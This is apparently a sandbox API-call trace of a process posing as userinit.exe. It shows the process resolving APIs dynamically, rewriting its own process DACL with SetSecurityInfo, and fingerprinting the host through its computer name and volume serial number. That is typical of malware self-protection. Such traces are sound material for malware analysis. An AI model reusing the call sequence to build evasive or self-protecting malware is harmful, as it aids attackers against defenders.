[0090.749] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f90c, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x2a7f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0090.749] IsValidSid (pSid=0x2a7f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0090.749] ConvertSidToStringSidA () returned 0x1
[0090.749] LocalFree (hMem=0x2c6f58) returned 0x0
[0090.749] LocalFree (hMem=0x2c6f40) returned 0x0
[0090.749] ConvertStringSidToSidA () returned 0x1
[0090.749] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f998, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x2a7f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0090.749] IsValidSid (pSid=0x2a7f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0090.749] ConvertSidToStringSidA () returned 0x1
[0090.749] LocalFree (hMem=0x2c6f58) returned 0x0
[0090.749] LocalFree (hMem=0x2c6f40) returned 0x0
[0090.749] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.749] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0090.749] GetCurrentThread () returned 0xfffffffe
[0090.750] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.750] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0090.750] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x14ec5c | out: TokenHandle=0x14ec5c*=0x2953756) returned 0
[0090.750] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.750] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0090.750] GetCurrentProcess () returned 0xffffffff
[0090.750] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.750] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0090.750] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x2a7fa3c | out: TokenHandle=0x2a7fa3c*=0x1d0) returned 1
[0090.750] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.750] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0090.751] MapGenericMask (in: AccessMask=0x14ead4, GenericMapping=0x14ead8 | out: AccessMask=0x14ead4)
[0090.751] MapGenericMask (in: AccessMask=0x14ec08, GenericMapping=0x14ec0c | out: AccessMask=0x14ec08)
[0090.751] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.751] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0090.751] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14ec1c | out: TokenInformation=0x0, ReturnLength=0x14ec1c) returned 0
[0090.751] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.751] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0090.751] GetLastError () returned 0x7a
[0090.751] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.751] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0090.751] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x2c0780, TokenInformationLength=0x24, ReturnLength=0x14ec40 | out: TokenInformation=0x2c0780, ReturnLength=0x14ec40) returned 1
[0090.752] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fab0, pSourceSid=0x2c0788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a7fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0090.752] IsValidSid (pSid=0x2a7fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0090.752] ConvertSidToStringSidA () returned 0x1
[0090.752] LocalFree (hMem=0x2b9e80) returned 0x0
[0090.752] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.752] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0090.752] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fb34, pSourceSid=0x2a7fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a7fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0090.752] IsValidSid (pSid=0x2a7fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0090.752] ConvertSidToStringSidA () returned 0x1
[0090.752] LocalFree (hMem=0x2b9e80) returned 0x0
[0090.752] IsValidSid (pSid=0x2a7fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0090.752] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.752] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0090.753] CloseHandle (hObject=0x1d0) returned 1
[0090.753] ConvertStringSidToSidA () returned 0x1
[0090.753] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fa54, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x2a7fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0090.753] IsValidSid (pSid=0x2a7fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0090.753] ConvertSidToStringSidA () returned 0x1
[0090.753] LocalFree (hMem=0x2c6f58) returned 0x0
[0090.753] LocalFree (hMem=0x2c6f40) returned 0x0
[0090.753] ConvertStringSidToSidA () returned 0x1
[0090.753] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fae0, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x2a7fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0090.753] IsValidSid (pSid=0x2a7fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0090.753] ConvertSidToStringSidA () returned 0x1
[0090.753] LocalFree (hMem=0x2c6f58) returned 0x0
[0090.753] LocalFree (hMem=0x2c6f40) returned 0x0
[0090.753] ConvertStringSidToSidA () returned 0x1
[0090.753] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fbfc, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x2a7fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0090.753] IsValidSid (pSid=0x2a7fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0090.753] ConvertSidToStringSidA () returned 0x1
[0090.753] LocalFree (hMem=0x2c6f58) returned 0x0
[0090.753] LocalFree (hMem=0x2c6f40) returned 0x0
[0090.753] ConvertStringSidToSidA () returned 0x1
[0090.753] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fc8c, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x2a7fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0090.753] IsValidSid (pSid=0x2a7fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0090.753] ConvertSidToStringSidA () returned 0x1
[0090.753] LocalFree (hMem=0x2c6f58) returned 0x0
[0090.753] LocalFree (hMem=0x2c6f40) returned 0x0
[0090.754] ConvertStringSidToSidA () returned 0x1
[0090.754] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fd1c, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x2a7fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0090.754] IsValidSid (pSid=0x2a7fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0090.754] ConvertSidToStringSidA () returned 0x1
[0090.754] LocalFree (hMem=0x2c6f58) returned 0x0
[0090.754] LocalFree (hMem=0x2c6f40) returned 0x0
[0090.754] GetCurrentProcessId () returned 0xf50
[0090.754] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0xf50) returned 0x1d0
[0090.754] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.754] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0090.754] GetSecurityInfo () returned 0x0
[0090.768] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.768] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0090.769] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x2c0f28, pControl=0x14e9e2, lpdwRevision=0x14e9dc | out: pControl=0x14e9e2, lpdwRevision=0x14e9dc) returned 1
[0090.769] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.769] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0090.769] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x2c0f28, pOwner=0x14e9d8, lpbOwnerDefaulted=0x14e9cc | out: pOwner=0x14e9d8*=0x0, lpbOwnerDefaulted=0x14e9cc) returned 1
[0090.769] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.769] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0090.769] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x2c0f28, pGroup=0x14e9d8, lpbGroupDefaulted=0x14e9cc | out: pGroup=0x14e9d8*=0x0, lpbGroupDefaulted=0x14e9cc) returned 1
[0090.769] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.769] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0090.769] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x2c0f28, lpbDaclPresent=0x14e9d0, pDacl=0x14e9c4, lpbDaclDefaulted=0x14e9cc | out: lpbDaclPresent=0x14e9d0, pDacl=0x14e9c4, lpbDaclDefaulted=0x14e9cc) returned 1
[0090.769] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.769] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0090.770] IsValidAcl (pAcl=0x2c0f3c) returned 1
[0090.770] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.770] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0090.770] GetAce (in: pAcl=0x2c0f3c, dwAceIndex=0x0, pAce=0x14e864 | out: pAce=0x14e864*=0x2c0f44) returned 1
[0090.770] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fe74, pSourceSid=0x2c0f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a7fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.770] IsValidSid (pSid=0x2a7fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.770] ConvertSidToStringSidA () returned 0x1
[0090.770] LocalFree (hMem=0x2c7018) returned 0x0
[0090.770] GetAce (in: pAcl=0x2c0f3c, dwAceIndex=0x1, pAce=0x14e864 | out: pAce=0x14e864*=0x2c0f5c) returned 1
[0090.770] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7ff60, pSourceSid=0x2c0f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a7ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.770] IsValidSid (pSid=0x2a7ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.770] ConvertSidToStringSidA () returned 0x1
[0090.770] LocalFree (hMem=0x2c7018) returned 0x0
[0090.770] GetAce (in: pAcl=0x2c0f3c, dwAceIndex=0x2, pAce=0x14e864 | out: pAce=0x14e864*=0x2c0f70) returned 1
[0090.770] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a729c0, pSourceSid=0x2c0f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x2a729c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0090.770] IsValidSid (pSid=0x2a729c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0090.770] ConvertSidToStringSidA () returned 0x1
[0090.770] LocalFree (hMem=0x2c7018) returned 0x0
[0090.770] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.771] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0090.771] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x2c0f28, lpbSaclPresent=0x14e9d4, pSacl=0x14e9c8, lpbSaclDefaulted=0x14e9cc | out: lpbSaclPresent=0x14e9d4, pSacl=0x14e9c8, lpbSaclDefaulted=0x14e9cc) returned 1
[0090.771] LocalFree (hMem=0x2c0f28) returned 0x0
[0090.771] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.771] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.771] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0090.771] GetLengthSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0090.771] GetLastError () returned 0x0
[0090.771] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.771] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0090.771] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.771] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0090.771] InitializeAcl (in: pAcl=0x2c7fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x2c7fa8) returned 1
[0090.771] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.771] GetLengthSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0090.771] GetLastError () returned 0x0
[0090.771] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.772] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.772] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0090.772] SetLastError (dwErrCode=0x0)
[0090.772] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.772] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0090.772] GetSidSubAuthorityCount (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a7f615
[0090.772] GetLastError () returned 0x0
[0090.772] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.772] SetLastError (dwErrCode=0x0)
[0090.772] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.772] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0090.772] GetSidIdentifierAuthority (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a7f616
[0090.772] GetLastError () returned 0x0
[0090.772] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.772] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.772] SetLastError (dwErrCode=0x0)
[0090.772] GetSidSubAuthorityCount (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a7f615
[0090.772] GetLastError () returned 0x0
[0090.772] SetLastError (dwErrCode=0x0)
[0090.773] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.773] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0090.773] GetSidSubAuthority (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2a7f61c
[0090.773] GetLastError () returned 0x0
[0090.773] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.773] GetLengthSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0090.773] GetLastError () returned 0x0
[0090.773] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.773] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0090.773] AddAce (in: pAcl=0x2c7fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x2b2f90, nAceListLength=0x14 | out: pAcl=0x2c7fa8) returned 1
[0090.773] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.773] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0090.773] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.773] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0090.773] SetSecurityInfo () returned 0x0
[0090.774] CloseHandle (hObject=0x1d0) returned 1
[0090.774] GetComputerNameA (in: lpBuffer=0x2a7fd84, nSize=0x14ec9c | out: lpBuffer="CRH2YWU7", nSize=0x14ec9c) returned 1
[0090.774] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14eb88, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.774] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ec84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14ec98, lpMaximumComponentLength=0x14ec94, lpFileSystemFlags=0x14ec90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14ec98*=0x90c08a66, lpMaximumComponentLength=0x14ec94*=0xff, lpFileSystemFlags=0x14ec90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.774] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14eb90, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.774] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ec84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14ec98, lpMaximumComponentLength=0x14ec94, lpFileSystemFlags=0x14ec90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14ec98*=0x90c08a66, lpMaximumComponentLength=0x14ec94*=0xff, lpFileSystemFlags=0x14ec90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.775] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14eb90, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.775] VirtualAlloc (lpAddress=0x2a80000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a80000
[0090.775] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ec84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14ec98, lpMaximumComponentLength=0x14ec94, lpFileSystemFlags=0x14ec90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14ec98*=0x90c08a66, lpMaximumComponentLength=0x14ec94*=0xff, lpFileSystemFlags=0x14ec90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.775] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14eb88, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.775] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ec84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14ec98, lpMaximumComponentLength=0x14ec94, lpFileSystemFlags=0x14ec90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14ec98*=0x90c08a66, lpMaximumComponentLength=0x14ec94*=0xff, lpFileSystemFlags=0x14ec90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.775] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14eb88, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
